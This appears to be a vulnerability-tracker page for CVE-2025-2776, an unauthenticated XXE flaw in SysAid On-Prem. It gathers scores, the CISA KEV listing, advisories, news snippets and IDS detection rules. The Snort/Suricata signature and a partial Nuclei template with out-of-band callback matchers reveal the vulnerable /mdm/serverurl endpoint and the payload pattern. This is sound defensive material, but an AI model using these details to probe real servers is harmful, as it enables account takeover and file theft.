CVE-2025-2776
published 2025-05-07CVE-2025-2776: SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-08-12
Exploited in the wild
EPSS
72.97%
99.4th percentile
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sysaid | sysaid | <= 23.3.40 | — |
| sysaid | sysaid_on-prem | <= 23.3.40 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
|3c 21|ENTITY|20 25|
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)"; flow:established,to_server; http.uri; content:"/mdm/serverurl"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2776; classtype:web-application-attack; sid:2066206; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_12_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Exploit traffic targets HTTP POST requests to the /mdm/serverurl endpoint on SysAid On-Prem servers; monitor for this URI with XML entity injection patterns in the request body.
- →Out-of-band XXE exploitation can be detected via SSRF callbacks; look for outbound HTTP requests with a Java User-Agent originating from the SysAid server, indicating a triggered external entity fetch. ↗
- →The vulnerability is unauthenticated and resides in the Server URL processing functionality; no prior authentication is required to trigger the XXE, so any external access to /mdm/serverurl should be treated as suspicious. ↗
- →MITRE ATT&CK mapping: Initial Access via Exploit Public-Facing Application (T1190, TA0001); correlate SysAid exploitation attempts with subsequent lateral movement or credential access activity.
- ·The Snort/ET rule (sid:2066206) requires TLS decryption to be effective against HTTPS-protected SysAid instances, as indicated by the TLSDecrypt deployment metadata.
- ·The Nuclei/interactsh-based detection relies on out-of-band callback infrastructure; it will only fire if the SysAid server can make outbound HTTP connections to the probe host.
- ·Patched version is SysAid On-Prem 24.4.60; all instances on versions <= 23.3.40 remain vulnerable. Verify installed version before assuming coverage. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.3CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hvrh-gfrr-fgc9: SysAid On-Prem versions <= 23
ghsa_unreviewed·2025-05-07
CVE-2025-2776 [CRITICAL] CWE-611 GHSA-hvrh-gfrr-fgc9: SysAid On-Prem versions <= 23
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
VulnCheck
SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability
vulncheck·2025·CVSS 9.3
CVE-2025-2776 [CRITICAL] CWE-611 SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability
SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability
SysAid On-Prem contains an improper restriction of XML external entity reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Affected: SysAid SysAid On-Premise
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-14&host_type=src&vulnerability=cve-2025-2776; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-05-15&host_type=src&vulnerability=cve-2025-277
CISA
SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability
cisa·2025-07-22·CVSS 9.8
CVE-2025-2776 [CRITICAL] CWE-611 SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability
Vulnerability: SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability
Affected: SysAid SysAid On-Prem
SysAid On-Prem contains an improper restriction of XML external entity reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://documentation.sysaid.com/docs/24-40-60 ; https://nvd.nist.gov/vuln/detail/CVE-2025-2776
Remediation Due Date: 2025-08-12
Suricata
ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)
suricata·2025-12-09·CVSS 9.3
CVE-2025-2776 [CRITICAL] ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)
ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)"; flow:established,to_server; http.uri; content:"/mdm/serverurl"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2776; classtype:web-application-attack; sid:2066206; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signat
Nuclei
SysAid On-Prem <= 23.3.40 - XML External Entity
nuclei·CVSS 9.8
CVE-2025-2776 [CRITICAL] SysAid On-Prem <= 23.3.40 - XML External Entity
SysAid On-Prem
%foo;
]>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 4b0a00483046022100921a4ba376602756f59f8ad19311a18d48f3b718e745a623423a7b3aa0749695022100a7e927b2bdc21b01be40e09bee4c1431128c800d0e47e12318cfcfabce60d196:922c64590222798bb761d5b6d8e72950
Bleepingcomputer
CISA warns of hackers exploiting SysAid vulnerabilities in attacks
blogs_bleepingcomputer·2025-07-23·CVSS 9.8
CVE-2025-2775 [CRITICAL] CISA warns of hackers exploiting SysAid vulnerabilities in attacks
## CISA warns of hackers exploiting SysAid vulnerabilities in attacks
## Sergiu Gatlan
CISA has warned that attackers are actively exploiting two security vulnerabilities in the SysAid IT service management (ITSM) software to hijack administrator accounts.
The two unauthenticated XML External Entity (XXE) flaws, tracked as CVE-2025-2775 and CVE-2025-2776, were reported by watchTowr Labs security researchers in December 2024 and patched in March with the release of SysAid On-Prem version 24.4.60.
One month later, watchTowr Labs also published proof-of-concept code , showing that the SysAid vulnerabilities are trivial to exploit and allow attackers to retrieve local files containing sensitive information.
While CISA didn't share any additional details regarding these ongoing attacks, it
Greynoiseio
NoiseLetter March 2026
blogs_greynoiseio
NoiseLetter March 2026
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Greynoiseio
NoiseLetter May 2025
blogs_greynoiseio
NoiseLetter May 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2025-05-07
Published
2025-07-22
Added to CISA KEV
Exploited in the wild